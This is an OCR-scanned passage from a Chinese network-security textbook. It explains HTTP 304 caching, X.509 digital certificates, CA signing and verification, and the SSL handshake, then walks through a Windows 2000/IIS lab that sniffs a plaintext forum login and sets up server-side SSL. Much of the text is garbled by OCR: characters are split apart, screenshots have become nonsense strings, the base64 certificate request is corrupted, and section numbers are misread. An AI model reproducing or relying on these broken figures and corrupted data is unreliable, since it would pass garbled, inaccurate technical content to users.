明 客 户 端 临时 文件 夹 内 保存 的 是 index. html 文件 最 新 的 备份 , 没 必 要 再 次 重新 传递 。 于 
是 服务 器 只 返回 一 个 HTTP 应 答 报 文 , 通 知客 户 index. html 的 内 容 没 有 变化 ,可 以 使 用 
临时 文件 夹 内 的 备份 文件 ,服务 器 返回 的 HTTP 应 答 报 文 如 图 10-18 所 示 。 

这 个 应 答 报 文 的 HTTP 首部 第 一 行 是 HTTP/1.1 304 Not Modified, 它 是 在 通 
知客 户 index. html 文件 没有 变化 ,可 以 使 用 临时 文件 夹 中 的 备份 文件 。Date 参数 表明 服 
务 器 在 格林 尼 治 标准 时 间 2012-11-17 01:00:20 返回 了 这 个 应 答 。Content-Length 参数 
为 0, 表明 这 个 应 答 报 文 不 携带 任何 数据 。 

在 格林 尼 治 标准 时 间 2012-11-17 01:00:46 服务 器 端 index. html 的 内 容 发 生 了 变 
化 ,“hello” 被 修改 为 *hello!!1”。 随 后 客户 又 一 次 请 求 浏览 index. html, 它 发 出 的 请 求 报 
文 的 HTTP 首部 携带 IfModified-Since 参数 ,询问 Web 服务 器 “格林 尼 治 标准 时 间 
2012-11-17 00:54:01 之 后 index. html 文件 是 否 进行 过 修改 ”。 服 务 器 将 这 个 时 间 与 
index. html 文件 的 最 后 一 次 修改 时 间 进 行 比较 ,发 现 两 者 不 同 ,说 明 客 户 端 临时 文件 夹 
内 保存 的 不 是 index. html 文件 最 新 的 备份 ,需要 重新 传递 。 于 是 服务 器 返回 一 个 HTTP 
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s-port 


d-port 


seq number 


ack unmber 


DEST MAC 


flag 


window 


SOURCE MAC 


check 


urg 


人 


Link data 


length HTTP/1.1 304 Not Modified 
id flag Server:Microsoft.IIS/5.1 
check Date:Sat, 17 Nov 2012 01:00:20 GMT 


Web server ip 


Content-Length:0 


client ip 


应 答 报 文 , 将 修改 后 的 index. html 文件 内 容 返 回 给 客户 ,客户 会 使 用 新 文件 的 内 容 履 盖 


图 10-18 第 四 个 数据 报 是 服务 器 返回 的 应 答 报 文 


临时 文件 夹 内 的 陈旧 备份 。 服 务 器 返回 的 应 答 报 文 如 图 10-19 所 示 。 


s-port 


d-port 


seq number 


ack unmber 


DEST MAC 
SOURCE MAC 


flag 


window 


check 


urg 


nB 


| 
U 


length HTTP/1.1.200 OK 
id flag Server:Microsoft.IIS/5.1 
check Date:Sat, 17 Nov 2012 01:00:57 GMT 
Web server ip Content-Type:text/html 
client ip Accept-Ranges:bytes 


这 个 应 答 报 文 的 Date 参数 表明 服务 器 在 2012-11-17 01: 00:57 返回 这 个 应 答 。 
Last-Modified 参数 表明 index. html 的 最 后 一 次 修改 时 间 为 格林 尼 治 标准 时 间 2012-11- 
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Last-Modified:Sat, 17 Nov 2012 01:00:46 GMT 


Content-Length:7 


Hello!! 


图 10-19 第 六 个 数据 报 是 服务 器 返回 的 应 答 报 文 
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17 01:00:46。Content-Length 参数 为 7, 表 明 携 带 了 7 字 节 的 数据 。 在 HTTP 数据 部 分 
携带 的 是 index. html 文件 的 内 容 “hello!1”。 


105 HTTP 数据 加 密 协 议 SSL 


HTTP 以 明文 方式 在 客户 端 与 Web 服务 器 之 间 传 递 数据 ,一 些 敏感 的 信息 如 账户 、 
密码 、 邮 件 、 聊 天 内 容 如 通过 HTTP 传递 则 没有 安全 保证 。SSL 协议 可 以 对 HTTP 数据 
进行 加 密 , 进 而 增强 HTTP 的 安全 性 。 


105.1 数字 证 书 


学 习 SSL 协议 之 前 必须 先 学 习 数 字 证 书 。 顾 名 思 义 ,数字 证 书 像 生 活 中 每 个 人 拥有 
的 身份 证 件 一 样 ,区 别 在 于 数字 证 书 以 数字 信息 为 介 


质 ,用 在 网 络 环境 中 证 明 某 个 网 络 实体 的 身份 。 由 于 其 二 
本 身 的 优势 , 它 可 以 参与 到 数据 存储 加 密 、 数 据 传输 加 a 
密 .数据 传输 完整 性 保护 等 过 程 中 。 颁发 者 
目前 数字 证 书 大 多 使 用 X. 509 格式 ,如 图 10-20 所 有 效 起 始 时 间 
示 。 每 份 数字 证 书包 含 以 下 字段 : DX. 509 的 版 本 号 ; 有 效 终止 时 间 
@CA 的 唯一 标识 ; @ 证 书签 名 ; @CA 的 名 称 ; @ 证 书 主题 
有 效 期 的 起 始 和 结束 时 间 ; @ 客 户 实体 名 称 ; 客户 的 人 
公 钥 及 算法 。 图 10-20 XX. 509 数字 证 书 


图 10-21 为 X. 509 数字 证 书 实例 。 


[常规 | 详细 信息 


显示 (8) 闸 


值 Ee 
11 22 14 cd 00 00 00 00.. 
shalRSA 

ximi, guiyang, CN 
2008 年 4 月 26 日 9:37:42 
2009 年 4 月 26 日 9:47:42 


转 往 属性 | 医 $ 本 文件 C).. 


图 10-21 X. 509 数字 证 书 实例 
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10.52 CA 认证 中 心 颁发 数字 证 书 


因特网 上 有 专门 负责 颁发 数字 证 书 的 机 构 , 这 类 机 构 称 为 认证 中 心 (CA)。CA 负责 
为 客户 发 放 数 字 证 书 , 它 有 一 个 众所周知 的 无 法 伪造 的 公 钥 。CA 为 每 个 申请 数字 证 书 
的 客户 分 配 一 对 密 钥 , 即 公 钥 和 私 钥 ,CA 将 公 钥 写 到 数字 证 书 上 。 为 了 防止 证 书 被 伪 
造 ,CA 根据 证 书生 成 一 份 摘要 并 用 它 的 私 钥 对 摘要 进行 加 密 即 签名 。 然 后 CA 将 证 书 
和 私 钥 发 放 给 客户 。 数 字 证 书 通常 保存 在 客户 主机 的 下 浏览 器 中 或 USB KEY 中 。 下 
面 举例 说 明 数 字 证 书 的 颁发 过 程 。 

假设 客户 Bob 向 CA 认证 中 心 申请 一 个 数字 证 书 , 证 书 颁发 过 程 如 图 10-22 所 示 。 
首先 CA 核实 Bob 身份 ,包括 验证 Bob 的 身份 信息 。 通 过 验证 之 后 ,CA 认证 中 心 利用 
RSA 算法 为 Bob 计算 出 一 对 密 钥 (包括 一 把 公 钥 和 一 把 私 钥 )。 接 下 来 ,CA 利用 散 列 算 
法 (如 MD5) 计 算 初 始 证 书 ( 包 括 Bob 的 公 钥 以 及 Bob 和 CA 的 基本 信息 ) 的 散 列 值 ( 即 摘 
要 )。 对 计算 出 来 的 摘要 使 用 CA 的 私 钥 进 行 加 密 , 加 密 之 后 的 摘要 也 称 为 签名 之 后 的 摘 
要 。 最 后 将 签名 之 后 的 摘要 附 在 初始 证 书 之 后 形成 最 终 的 数字 证 书 。 这 个 数字 证 书 可 以 
对 外 公开 , 供 想 与 Bob 通信 的 用 户 使 用 。 

Bob 的 证 书 


Ba 一- 国 sw] 


散 列 函数 | CA 的 私 钥 


摘要 签名 后 的 摘要 
图 10-22 数字 证 书 的 颁发 


1053 数字 证 书 的 真实 性 验证 


由 于 个 人 数字 证 书 是 对 外 公开 的 ,因此 任何 人 都 可 以 下 载 使 用 ,那么 如 何 验证 证 书 的 
真 伪 呢 ? 验证 数字 证 书 的 前 提 是 你 的 主机 已 经 预先 保留 了 CA 的 公 钥 。 如 果 主 机 安装 了 
Windows 操作 系统 ,那么 当前 知名 CA 认证 中 心 的 根 证 书 已 经 预先 安装 到 IE 浏览 器 中 ， 
如 图 10-23 所 示 。 根 证 书 中 保存 了 对 应 CA 认证 中 心 的 公 钥 。 

假设 某 人 下 载 了 Bob 的 数字 证 书 , 图 10-24 给 出 的 是 证 书 的 验证 过 程 。Bob 的 数字 
证 书 被 分 为 两 部 分 , 即 签名 之 后 的 摘要 和 Bob 的 初始 证 书 ( 包 括 Bob 的 公 钥 以 及 Bob 和 
CA 的 基本 信息 )。 对 签名 后 的 摘要 使 用 CA 的 公 钥 进行 解密 ,对 Bob 的 初始 证 书 使 用 相 
同 的 散 列 函数 重新 计算 摘要 ,如果 两 份 摘要 相同 ,说 明 这 份 摘要 使 用 CA 的 私 钥 加 密 。 而 
CA 的 私 钥 只 有 CA 自身 掌握 ,因此 可 以 认定 这 是 一 份 真实 的 Bob 证 书 。 如 果 是 其 他 人 
伪造 的 证 书 ,那么 两 份 摘要 一 定 不 同 。 
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预期 目的 0): 所 有 
个 人 _ | 其 他 人 中 级 证 书 颁 发 机 构 | 受信 任 的 根 证 书 颁发 机 构 


颁发 给 颁发 者 

国 ABA. PCOW Root CA ABA ECOM Root CA 2009-7-10 

国 Autoridad cert Autoridad Certif. 2009-6-29 Autoridad Ce... 
国 Aatoridad Cert... Autoridad Certif... 2009-6-30 Autoridad Ce.. 
Baltinore EZ b... Baltimore EZ by IST 2009-7-4 JST (Baltino.. 
Beleacon PE-Tru .. Belgacon E-Trust... 2010-1-21 Belgacon E-T.. 
国 cag HET Secure... Cag JET Securele 2009-1... CW HET Secur. 
国 cay Her Secure... CaW HET SecureNe... 2009-1... CW HET Secur. 


国 car HET Secure Ca HET SecureNe... 2010-1. CW HET Secur 


Feom yor 0 am sme 地 oon 


导入 加 ).. 导出 到) 删除 @B) 


证 书 的 预期 目的 


图 10-23 Windows 主机 预先 保存 的 知名 CA 认证 中 心 的 根 证 书 列表 


Bob 的 证 书 


CA 下 载 Bob 的 证 
从 CA 下 载 Bob 的 证 书 Bob 的 公 角 


| | 
解密 2 散 列 函数 
CA 的 公 钥 
1 
比较 
摘要 摘要 


图 10-24 数字 证 书 真 实 性 验证 


1054 数字 证 书 使 用 的 SSL 协议 
客户 申请 数字 证 书后 即 可 通过 SSL 协议 来 访问 支持 SSL 协议 的 Web 服务 器 。SSL 


协议 位 于 HTTP 和 TCP 之 间 。 端 口 为 443。 客户 服务 器 
下 面 对 SSL 协议 的 通信 过 程 ( 见 图 10-25) 进 行 
分 析 。 | Hello [| 
(1) 客户 向 服务 器 发 送 Hello 报 文 , 其 中 包 客户 的 证 书 [| 
括 SSL 的 版 本 及 一 些 参数 。 -| 服务 器 证 书 
(2) 客户 将 自己 的 数字 证 书 发 送 给 服务 器 ， 加 密 后 的 一 次 性 对 称 密 钥 上 一 | 
服务 器 使 用 CA 的 公 钥 对 客户 证 书 的 合法 性 进 ”上 数据 交换 [| 
行 校 验 , 即 验证 该 证 书 是 否 由 CA 颁发 ( 注 : 客 
户 和 服务 器 的 主机 上 都 预先 安装 了 CA 的 根 证 ! ' 


书 , 即 CA 的 公 钥 )。 校 验方 法 如 下 : 服务 器 将 图 10-25 ”SSL 协议 的 通信 过 程 
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客户 证 书 分 为 两 部 分 , 即 有 效 部 分 和 签名 后 的 摘要 ,对 有 效 部 分 使 用 散 列 函数 处 理 得 到 一 
份 摘要 ,对 签名 后 的 摘要 使 用 CA 的 公 钥 解密 ,还 原 出 一 份 摘要 。 如 果 两 份 摘要 相同 ,说 
明 该 证 书 由 特定 CA 颁发 ,继续 执行 第 三 步 。 如 果 两 份 摘要 不 同 ,说明 该 证 书 不 是 由 特定 
CA 颁发 ,执行 到 此 结束 ,用 户 登 录 失 败 。 通 过 这 一 步 服务 器 就 鉴别 了 客户 证 书 的 真 

(3) 服务 器 将 自己 的 数字 证 书 传递 给 客户 ,客户 验证 服务 器 的 身份 是 否 合法 , 即 服务 
器 证 书 是 否 由 CA 颁发 。 验 证 方法 与 步骤 (2) 类 似 。 如 果 服 务 器 证 书 合法 , 则 进行 步骤 
(4) ,否则 执行 到 此 结束 。 通 过 这 一 步 客户 就 鉴别 了 服务 器 证 书 的 真实 性 。 

(4) 客户 产生 一 个 一 次 性 对 称 密 钥 , 用 服务 器 的 公 钥 对 它 进行 加 密 , 再 将 它 发 送 给 服 
务 器 。 这 个 使 用 服务 器 公 钥 加 密 的 一 次 性 对 称 密 钥 只 有 使 用 服务 器 的 私 钥 才能 解密 , 因 
此 它 可 以 通过 网 络 安全 地 传递 。 

(5) 客户 与 服务 器 之 间 交 换 的 数据 都 使 用 第 (4) 步 产生 的 一 次 性 对 称 密 钥 进行 加 密 ， 
因此 数据 的 保密 性 可 以 得 到 保证 ,其 他 人 不 能 查看 通信 内 容 。 

在 SSL 协议 中 ,通信 数据 的 完整 性 和 防 拒 认 也 可 以 得 到 保证 , 现 举例 说 明 。 假 设 客 
户 甲 通过 网 上 银行 进行 转账 操作 ,他 需要 向 服务 器 提交 的 数据 包括 转 出 账号 、 转 出 金额 、 
转 入 账号 等 重要 信息 ,在 提交 数据 之 前 甲 首先 对 数据 使 用 散 列 函数 处 理 得 到 一 份 摘要 , 然 
后 对 摘要 使 用 自己 的 私 钥 进行 签名 ,再 对 数据 和 签名 之 后 的 摘要 使 用 一 次 性 对 称 密 钥 加 
密 , 最 后 将 加 密 之 后 的 数据 传递 给 服务 器 。 服 务 器 收 到 数据 后 ,首先 使 用 一 次 性 对 称 密 钥 
解密 数据 ,然后 使 用 客户 的 公 钥 验证 签名 ,如 果 签 名 合法 ,说 明 数 据 在 传输 过 程 中 没有 被 
恶意 修改 , 即 它 的 完整 性 得 到 了 保证 ,同时 由 于 甲 的 私 钥 只 有 甲 自己 知道 ,因此 甲 不 能 拒 
认 自 己 确实 进行 了 转账 操作 。 这 样 一 来 ,数据 的 完整 性 和 防 拒 认 就 得 到 了 保证 。 

1055 配置 只 使 用 服务 器 证 书 的 SSL 加 密 通 道 

目前 只 使 用 服务 器 证 书 的 SSL 加 密 通道 应 用 广泛 ,当前 主流 的 电子 邮箱 服务 器 (如 
126、163) 均 采用 这 种 加 密 方式 。 下 面 通过 一 个 训练 来 学 习 这 类 加 密 通 道 的 配置 方法 。 

按照 图 10-26 组 建 实验 环境 ,使 用 两 台 Windows 2000 虚拟 机 分 别 模拟 CA 认证 中 心 
和 Web 服务 器 ,本 机 模拟 客户 。 首 先 Web 服务 器 向 CA 认证 中 心 递交 一 份 证 书 申请 ， 
CA 审查 证 书 申请 合格 之 后 颁发 数字 证 书 , 之 后 Web 服务 器 安装 证 书 ,最 后 客户 通过 加 


密 通 道 访问 Web 站 点 。 实 验 步 又 如 下 。 
村 虚拟 机 1(CA 认 证 中 心 ) 
192.168.0.3 


中 申请 证 书 
@ 颂 发 证 书 
虚拟 机 2(Web 服 务 器 ) 本 机 (客户 ) 
192.168.0.4 过 加 加 密 通 信 一 192.168.0.2 
图 安装 证 书 


图 10-26 ”测试 环境 
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第 一 步 : 按照 图 10-26 组 建 网 络 ,配置 IP 地 址 ,使 用 host-only 方式 连接 网 络 ( 步 
又 略 ) 。 

第 二 步 : 在 虚拟 机 1 上 安装 CA 证 书 服务 。 安 装 之 后 在 Web 默认 站 点 会 多 出 一 个 虚 
拟 目录 CertSrv, 该 目录 内 存放 的 主页 支持 远程 用 户 申请 证 书 ( 可 以 右 击 浏览 ), 见 
图 10-27。 


> Internet 信息 服务 


支持 通过 浏览 
器 申请 证 书 田 -人 CertContral 

的 certEnrol 

由 -的 pnters 

mages 

由 国 _private 

由 国 _wi_onf 

由 重 -wijog 


由 国 -Lpwt 
外) _vti_script 
针 -YLbt 

田 - 堵 管 理 web 站 点 


图 10-27 虚拟 目录 CertSrv 


第 三 步 : 在 虚拟 机 2 上 安装 一 个 “论坛 ?站 点 (步骤 略 ) 。 
第 四 步 : 在 客户 端 登录 “论坛 ”, 同 时 用 Sniffer 捕获 通信 数据 , 找 出 明文 方式 传输 的 
用 户 名 和 密码 。 客 户 登 录 界 面 如 图 10-28 所 示 。 


GO- 图 Nttp:Wle2 .188.0 Wantevindex esp 图 [B|E+ [x 
文件 中 屿 辑 人 E) 查看 WW) 收藏 天 和 ) 工具 (TD) 帮助 0 

窗 收藏 来 | 次 加 这 以 同 站 。 加] 免费 Hotnsil 到 ] 月 页 快讯 订 > 

生计 直 城 市 信息 WE 论坛 [ 从 - 


、， CNKBBS| 山 风暴 论 


< 


欢迎 来 到 深圳 城市 信息 贴吧 论坛 ! 

如 您 懒得 注册 ， 一 祥 可 以 在 这 畅所欲言 !1 
建议 悠 申请 注册 ， 这 样 您 会 更 方便 地 发 表 贴 子 111 
加 果 你 在 使 用 过 程 有 好 的 意见 建议 ,欢迎 您 给 我 们 
提出 。 

如 果 你 想 试 试 发 贴 ， 那 么 可 以 在 试 洪水 区 先 试 试 ， 
不 要 放 洪水 哦 :) 


@ Internet 和 下 100% > 


图 10-28 客户 登录 界面 
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加 网络 安全 基础 gm 


图 10-29 是 使 用 Sniffer 捕获 的 登录 数据 报 ,可 以 明显 看 到 第 15 个 数据 报 是 客户 发 
送 给 Web 服务 器 的 登录 报 文 ,在 这 个 数据 报 的 HTTP 数据 部 分 携带 了 客户 以 明文 方式 
提交 的 用 户 名 Peter 和 密码 2480。 可 见 在 没 开 启 SSL 加 密 通道 之 前 ,客户 与 服务 器 之 间 
的 通信 数据 以 明文 方式 传递 。 


speed at 100 Wbps) 一 


[sai 


ay 


Tenls Databese intor te 
全/ 晨 | 公 | 要 | 六 | 习 区 | 思 | 多 | 加 | | ;| nl sm| 到 


Fy TE ET Desadoress ET 
TC 


了 


poo002c0 
000002d0 
ono002e0 


[nnnn2f0 中 


[Je | I lt 


图 10-29 使 用 Sniffer 捕获 的 登录 数据 报 


第 五 步 : Web 服务 器 生成 数字 证 书 申请 。 

在 IIS 中 右 击 Web 站 点 ,选择 “属性 ?~ 目录 安全 性 ”服务 器 证 书 ” 一 “创建 一 个 
新 证 书 ” 习 位 长 选择 1024 一 站 点 的 公用 名 称 输 入 www. abc. com 一 保存 在 c:\certreq. 
txt。 该 文件 为 base64 编码 。 关 键 步骤 截图 如 图 10-30 一 图 10-36 所 示 。 


服务 器 证 书 
有 三 种 方法 将 证 书 分 配 到 Yeb 站 点 上 。 


选取 您 想 用 于 此 Web 站 点 的 方法 : 

人 创建 一 个 新 证 有 C)。， 

个 分 配 一 个 已 存在 的 证 书 &)。 

个 从 密 钥 管理 器 备份 文件 导入 一 个 证 书 @)。 


《 上 一 步 @) | 下 一 步 中 > 取消 


图 10-30 ”创建 一 个 新 证 书 
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命名 和 安全 设置 
新 证 书 必 须 有 名 称 和 指定 位 长 。 


输入 新 证 书 的 名 称 。 此 名 称 应 容易 引用 和 记忆 。 
名 称 


Fr abe. com 


本 位 长 越 大 ， 安 全 性 就 越 高 。 但 是 ， 过 


厂 服务 器 网 关 加 密 (56C) 证 书 ( 羽 为 了 导出 版 本 ) (8) 


CA 取消 


图 10-31 输入 Web 服务 器 域名 , 选 定 密 钥 位 数 


is 证 书 向 导 | 
钥 织 信息 
您 的 证 书 必须 有 您 的 组织 的 相关 信息 ， 以 便 格 其 与 其 它 组 织 区 分 。 


选 职 或 着 输入 您 的 姐 织 名 称 和 部 门 名 称 。 这 应 该 是 合法 的 组 织 名 称 和 部 门 名 称 。 
如 需 进一步 的 信息 ， 请 参阅 证 书 颁发 机 构 的 Yeb 站 点 。 


组 织 @); 
让 加 天 要 字 陆 | 了 
组 织 部 门 QU): 

| 匡 玫 到 滞 可 


《上 一 步 @ 取消 


图 10-32 输入 机 构 名 称 


地 理 信息 
证 书 笑 发 机 构 需要 以 下 的 地 理 信息 。 


国家 籽 区 ) 人 ): 
CN (中 华人 民 共 和 医 梧 


省 、 市 /自治 区 @) 


生字 省 | 
市 /县 四: 
院 阳 而 | 国 


必须 填写 “省 、 市 / 自治区” 和 “市 /县 ”， 标准 名 称 中 不 能 包 合 缩写 。 


《上 - 步 四 [下 - 步 四 让。 台 消 


图 10-33 输入 地 理 信息 


271 


272 


证 书 请 求 文件 名 
证 书 请 求 用 您 指定 的 文件 名 被 保存 为 一 个 文本 文件 。 


为 证 书 请 求 输入 一 个 文件 名 。 


文件 和 名医): 


< 上 一步 @@) 取消 


图 10-34 指定 证 书 请 求 文件 的 保存 位 置 


请 求 文件 荐 要 

您 已 选择 创建 请 求 文 件 。 

车 要 生成 下 列 请 求 ， 请 单 击 “ 下 一 步 ”。 

文件 名: 

eiN\certreq, txt 

您 的 请 求 包含 下 列 信息 : 
全 cepe-cmks8906bu 


图 10-35 ”查看 证 书 请 求 的 基本 信息 


届 certreq - 记事 本 


|-----BEGIN NEW CERTIFICATE REQUEST--———— 
MIIDCjCCANMCAQAwdTEYMBYGA1UEAxMPY2NwYy1jbWtz0DkwNmJ1MRMwEQYDUQQL 
Hgp/UX7cW41RaHz7MRUwEwYDUQQKHgxO0LUb9UhGLZ1tmlmIxDzANBgNVUBAceBmy I 
1ijNeAjEPMAGGA1UECB4Gj71bgXcBMQswCQYDUQQGEwJDTjCBNzANBgkqhkiG9w8B 
AQEFAAOBjQAwgYkCgYEApH9SdbxGalgRhspjdmODbiTAtGgY2zHKPA6QKI7hKT72 
hT221BwIzwc25yffx2092121XEv8AD96/niApNqBKuwu6Uw9MEqA8Ioh3R3guh/5 
TbXSmRTTUIF/Y HNES336iZ290EFDorZSm2qmaHWztcYARORUwzYE3aU6voIqhnx8C 
AwEAAaCCAUMwGgYKKwYBBAGCNwOCAZEMFgo1L jAuMjESNS4yMDUGCisGAQQBgijcC 
AQHxJZALIMANMGAT1UdDwEB/wQEAWwIESDATBIgNUHSUEDDAKBggrBgEFBQCDATCB/QYK 
KuwyBBAGCNweCAjGB7 jCB6wIBARSaAE 8AaQBjAHIAbwBzAG8AZgB OACAAUgBTAEEA 
IABTAEMAaABhAGHAbDIgB1AGwAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAA 
UAByAG8AdgBpAGQAZQBYyA4GJAF8TbgM+oHAWmUHXN/FKNjwK6CjFvLKa3Cr+8A9n 
p3M+u1nLfQ2eQpBspyxstH/i33+1YkgyasWFmnievHXaoF8gkiIlpRet5Irz84guss 
S2jU*+ub93JyhceFK1Kx12bbm+z0/zbsUoqT1ltFb+8gh4Gp8qcQ8kc6eiIlbpRJy+A 
DxB+AAAAAAAAAAAwDQY JKoZIhucNAQEFBQADgYEAcSso0Aa1Yvutz2B10s7kuiAgwr 
ULithsYUi0Aio3ceNoqFHXz4K7WcqQEUT2QU+SIHo7xUTm8U1HAUYQIhhWAtYFT 
MIeILgBunUTS5mWDeSRShKgoh8HRTJZt7DM+IE+x5 BeoU6zoH3mbBL# yk BZZCDYyY 
Uergzbqmp8JY7SXZBIY= 

FF END NEW CERTIFICATE REQUEST-———— 


图 10-36 ”以 base64 编码 形式 保存 的 证 书 申请 


EE 第 ]0 章 


HTTP 及 类 安全 问题 = 
第 六 步 : Web 服务 器 向 CA 认证 中 心 提交 证 书 申请 。 
打开 Web 服务 器 上 的 下 浏览 器 ,在 下 地 址 栏 输入 “http://192. 168.0.3/certsrv/”, 选 


择 “ 申 请 证 书 ”>“ 下 一 步 ” 一 “高 级 申请 ”一 使 用 base64 编码 提交 申请 一 粘贴 certreq. txt 
的 内 容 。 配 置 的 关键 步骤 如 图 10-37 一 图 10-41 所 示 。 


oft Internet Explorer 


您 使 用 此 Web 站 点 为 您 的 Web 浏览 器 ， 电 子 邮 件 客户 端 ， 或 其 它 安全 程序 申 
请 一 个 证 书 。 一 旦 您 获得 一 个 证 书 ， 您 将 能 够 安全 地 向 Web 上 的 其 他 人 标识 您 
自己 ， 为 电子 邮件 签名 ， 加 密 电 子 凶 件 ， 以 及 其 它 ， 基 于 您 申请 的 证 书 类 型 。 


和 
申请 证 书 
检查 挂 起 的 证 书 


可 Microsoft 证 书 服务 - Microsoft Internet Explorer 


图 10-38 选择 “高 级 申请 ” 


可 microsoft 证 书 服务 


Microsoft Internet Explorer 


高 级 证 书 申请 


您 可 以 用 下 列 方法 之 一 为 您 自己 ， 其 仙 和 或 计算 机 申请 一 个 证 书 。 请 注意 证 
书 颁 发 机 构 (CA) 的 策略 将 决定 您 能 获得 


© 使 用 表格 向 这 个 CA 提交 一 个 证 书 申请 。 


© base64 编码 的 PKCS 机 0 文件 提交 一 个 证 书 甲 请 ， 或 使 用 base64 编 


的 PKCS #7 文件 更 新 证 书 申请 。i 


C 使 用 智能 卡 注 册 站 为 代表 另 一 用 户 的 智能 卡 申 请 一 个 证 书 。 
你 必须 冶 一 个 茸 解 让 谨 证 廊 以 为 呈 一 局 户 经 分 一 个 特 往 . 


[EE 三 


图 10-39 选择 使 用 base64 方式 提交 申请 
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戎 ] http://192.168.0.3/certsrv/certrqxt.asp 


BEGIN NEW CERTIFICATE REQUEST-— 
MIIDCjCCANNCAQAWwATEYNBYGA1UEAxMPY2NwYy13 
Base64 编码 HopyUX?7cWU41RaHz7MRUwEUYDVOOKHgxOLVb9UhGL 
证 书 申请 |1jNeAjEPNAOGA1UECB4Gj71bgXcBNQswCQYDVQQG 
(PKCS #10 或 #7): |AQEF AAOBjQAwgYKCIYEApHOSdbxGalgRhspjdmOD; 
|hTzz1BwIzwc25yffx209ZI21XEvBAD96/niapNqB J 


浏览 要 插入 的 文件 。 


图 10-40 ”提交 证 书 申请 


可 Microsoft 证 书 服务 - Microsoft Internet Explorer 

| 文件 (E) ”编辑 (B。 查看 (四 ”收藏 (工具 ID 和 助 (H) 

| 宇和 四 日 徊 | 和 @ 皇 提 壤 加 | 书 * 急 

BEGG [ 轿 http://192,168.0.3/certsrv/certFnsh.asp 7| BP 茜 到 | 链接 > 


证 书 挂 起 

您 的 证 书 申 请 已 经 收 到 。 不 过 ， 您 必须 等 待 管理 员 发 布 您 申请 的 证 书 。 
请 在 一 天 或 两 天 内 回 到 此 web 站 点 以 检索 您 的 证 书 。 

注意 : 您 必须 用 此 web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 


图 10-41 申请 提交 结束 
第 七 步 : CA 认证 中 心 颁发 证 书 。 
CA 认证 中 心 颁发 证 书 。 选 择 “ 开 始 ” 一 “程序 ”一 “管理 工具 ”一 “证 书 颁 发 机 构 ” 一 
“待定 申请 ”一 右 击 证 书 一 颁发 ”。 关 键 步骤 如 图 10-42、 图 10-43 所 示 。 


鲜 证 书 颁 发 机 构 
上 拧 作 G) 查看 W || 所 二 | 牛 | 因 | 国 攻 | 多 


证 书 颁发 机 构 (本 地 ) 


Xinxi 


图 吊销 的 证 书 
图 烽 发 的 证 书 
司 待定 申请 

图 不 成 功 的 申请 


图 10-42 等 待 审批 的 申请 
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Se 
加 待定 申请 
国 不 成 功 的 申请 


I | 
图 10-43 通过 审批 的 证 书 


第 八 步 : Web 服务 器 查收 、 下 载 证 书 。 

在 Web 服务 器 的 下 地址 栏 输 入 “http://192.168.0. 3/certsrv/”, 选 择 “ 检 查 挂 起 的 
证 书 ”> 按 提示 完成 操作 ,如 图 10-44 所 示 。 

第 九 步 : 将 证 书 安装 到 Web 服务 器 。 

在 Web 服务 器 的 IIS 管理 器 中 右 击 站 点 名 称 一 "属性 ?目录 安全 性 ?一 服务 器 证 
书 ”>“ 处 理 挂 起 的 请 求 并 安装 证 书 ” 一 选中 “证 书 安装 ”。 

在 “目录 安全 性 ”下 单 击 “ 编 辑 ” 一 “申请 安全 通道 (SSL)” 一 “忽略 客户 证 书 ”, 如 
图 10-45 所 示 。 


1156 F81C 0000 0000 0002 
shalRSA 

xinxi, guiyang, CH 
2012 年 11 月 19 日 17:10:37 
2013 年 11 月 19 日 17:20:37 
ccpe-emks8906bu， 网 络 安全 系 ， 


RSA (1024 Bits) 


厂 启用 客户 证 书 映射 L) 


SO 


厂 启用 证 书信 任 列表 名 


要 前 的 IO 到 
刀 加 届 伍 了 E) | 复制 国文 件 CC)..、 by 蝙 辑 0) 


取消 | 和 二 中 | 
图 10-44 Web 服务 器 的 数字 证 书 图 10-45 忽略 客户 端 证 书 


单 击 Web 站 点 一 SSL 端口 输入 443 。 
第 十 步 : 在 客户 端 使 用 SSL 加 密 通 道 访问 “论坛 ", 同 时 使 用 Sniffer 捕获 加 密 通 信 
在 客户 端 访问 Web 服务 器 ,这 时 须 使 用 SSL 通道 ,浏览 界面 如 图 10-46 所 示 。 
在 客户 端 使 用 Sniffer 捕获 登录 数据 ,结果 如 图 10-47 所 示 。 可 见 传输 数据 使 用 的 是 
TCP443 端口 ,整个 通信 中 没有 明文 形式 传递 的 数据 ,客户 提交 的 账户 名 和 密码 信息 也 以 
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1 深圳 城市 信息 贴吧 论坛 - Windows Internet Explorer 
GO- Eo/em i °° vx 
文件 外 ”编辑 外 查看 W) 收藏 天 上) 工具 上 天 助人 0 
宣 收 襄 天 | 次 居于 六 辣 站 ”加 免费 Jotmail 居 网 由 快 讯 库 > 
| 加 区 页面 @) ”安全 G) I 上 QW- 加 ” 


(dQ NERBES ya a 


[0( 公告 栏 三 


欢迎 来 到 深圳 城市 信息 贴吧 论坛 ! 

如 您 懒得 注册 ， 一 样 可 以 在 这 畅所欲言 1 
建议 您 申请 注册 ， 这 样 您 会 更 方便 地 发 表 贴 子 111 
加 果 浆 在 使 用 过 程 有 好 的 意见 建议 ,欢迎 您 给 我 们 
提出 。 

如 果 你 想 试 试 发 贴 ， 那 么 可 以 在 试 泪水 区 先 试 试 ， 
不 要 放 洪 水 哦 :) 


图 10-46 在 客户 端 使 用 IP 地 址 访问 Web 服务 器 
加 密 方式 传递 。 


Ethernet 


4 
2 
2 
4 


ne 729 see pb ii EH ee ch Ho HT DE ro tc rn 
00000010; 00 63 le dd 0 00 40 06 3a 61 c0 28 00 02 <0 5 
pnonnn20， 0 I 

joo000030 


Expen N Decode WAM ost Tne A Pratocol rst A Setehes 
or Healy, ress HL 6@—s— —— a 


图 10-47 使 用 Sniffer 捕获 的 加 密 通 信和 数据 


10.56 配置 同时 使 用 服务 器 证 书 和 客户 证 书 的 SSL 加 密 通 道 


目前 同时 使 用 服务 器 证 书 和 客户 证 书 的 SSL 加 密 通 道 被 广泛 应 用 在 各 大 网 上 银行 ， 
各 家 银行 为 用 户 提供 的 U 盾 中 就 保存 了 用 户 的 个 人 数字 证 书 。 下 面 通过 一 个 训练 来 学 
习 这 类 加 密 通 道 的 配置 方法 。 

按照 图 10-48 组 建 实 验 环境 ,使 用 两 台 Windows 2000 虚拟 机 分 别 模拟 CA 认证 中 
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心 和 Web 服务 器 ,本 机 模拟 客户 。 首 先 Web 服务 器 向 CA 认证 中 心 递交 一 份 证 书 申 
